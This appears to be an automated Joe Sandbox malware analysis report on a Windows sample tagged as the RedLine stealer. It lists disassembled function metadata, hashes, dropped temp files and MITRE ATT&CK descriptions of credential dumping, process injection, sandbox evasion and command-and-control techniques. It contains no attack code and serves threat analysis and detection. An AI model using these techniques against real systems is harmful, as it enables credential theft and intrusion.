Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: c1ddb1cf0ff036cb6baba0efbe24db81332f337cba58c0315da8898fa1486854
Instruction ID: 281d61034b237045d86f2e25a79fe1a142c826d0af89fa7a26d003d47da0ee55
Opcode Fuzzy Hash: c1ddb1cf0ff036cb6baba0efbe24db81332f337cba58c0315da8898fa1486854
Instruction Fuzzy Hash: 6601B171A41108BBDF08EBA4D996EFE77A8AF05300B140119BA1267282EB195E0C8262

Function 00799264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

Part of subcall function 0079B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0079B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 007992D0

Strings

ComboBox, xrefs: 00799271
ListBox, xrefs: 0079929C

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: a27268e39c8e78c833a9b88715d4b60d80a2952caf368fc9e1272098f886e356
Instruction ID: d27c8714b712e4c5499e276856b489cb04b47f7f36449ce8bd8de48e2c814a9c
Opcode Fuzzy Hash: a27268e39c8e78c833a9b88715d4b60d80a2952caf368fc9e1272098f886e356
Instruction Fuzzy Hash: 9401A771A41108B7DF04E7A4D986EFF77ACAF11300F140119BA12632C2DB195F0C9271

Function 007A51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 007A51E8
_wcscmp.LIBCMT ref: 007A51FA

Strings

#32770, xrefs: 007A51F4

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: b97ff1d0fa7ef3ac9ba44bfc7c7ee0884f7975381d6ae8fd4c97c0bc4d67e554
Instruction ID: b36b3c5dee1023f111337192b80d039cfc765bfedbcabe0c49c85a3f6b0b3f9c
Opcode Fuzzy Hash: b97ff1d0fa7ef3ac9ba44bfc7c7ee0884f7975381d6ae8fd4c97c0bc4d67e554
Instruction Fuzzy Hash: 2EE06172A0022C2BD71097959C49FA7F7ACFB41731F00016BFD14D3040D57499048BD0

Function 007981BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007981CA

Part of subcall function 00763598: _doexit.LIBCMT ref: 007635A2

Strings

AutoIt, xrefs: 007981BE
Error allocating memory., xrefs: 007981C3

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 14470d17011fcbfd57d52f813ba2afd03b0b2a73d177dc3af66909bec2707cbb
Instruction ID: e29f8ec4d2df1fcf19a47ceb9a17b3d4db0ab2ee2e5dc5d1e39f8abe3a1e5022
Opcode Fuzzy Hash: 14470d17011fcbfd57d52f813ba2afd03b0b2a73d177dc3af66909bec2707cbb
Instruction Fuzzy Hash: 92D05B323C535C72D61432B47C0FFD676484B15B51F444016FF09A56D38EDD599152ED

Function 0077B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0077B564: _memset.LIBCMT ref: 0077B571

Part of subcall function 00760B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0077B540,?,?,?,0074100A), ref: 00760B89

IsDebuggerPresent.KERNEL32(?,?,?,0074100A), ref: 0077B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0074100A), ref: 0077B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0077B54E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 3514cfd74c6ec3494bdd973a54f7ef7ef8dea12989eacaf144c2b561fd9caac7
Instruction ID: b6a473924975366bd34addce8c28029fea8feffe8d25e48e0b7dc0c6064604bd
Opcode Fuzzy Hash: 3514cfd74c6ec3494bdd973a54f7ef7ef8dea12989eacaf144c2b561fd9caac7
Instruction Fuzzy Hash: F1E06DB0200750CBD720DF29E8087427BE4BF08758F00C92CE44AC2261EBBCD415CBA1

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report b3u71vBG0u.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Temp\Okeghem

C:\Users\user\AppData\Local\Temp\aut13C0.tmp

C:\Users\user\AppData\Local\Temp\aut13FF.tmp

C:\Users\user\AppData\Local\Temp\brontothere

C:\Users\user\AppData\Local\Temp\tmp10D.tmp

C:\Users\user\AppData\Local\Temp\tmp209C.tmp

C:\Users\user\AppData\Local\Temp\tmp20AC.tmp

C:\Users\user\AppData\Local\Temp\tmp20BD.tmp

C:\Users\user\AppData\Local\Temp\tmp20BE.tmp

C:\Users\user\AppData\Local\Temp\tmp20CF.tmp

C:\Users\user\AppData\Local\Temp\tmp20D0.tmp

C:\Users\user\AppData\Local\Temp\tmp37AE.tmp

C:\Users\user\AppData\Local\Temp\tmp37AF.tmp

Windows Analysis Report
b3u71vBG0u.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre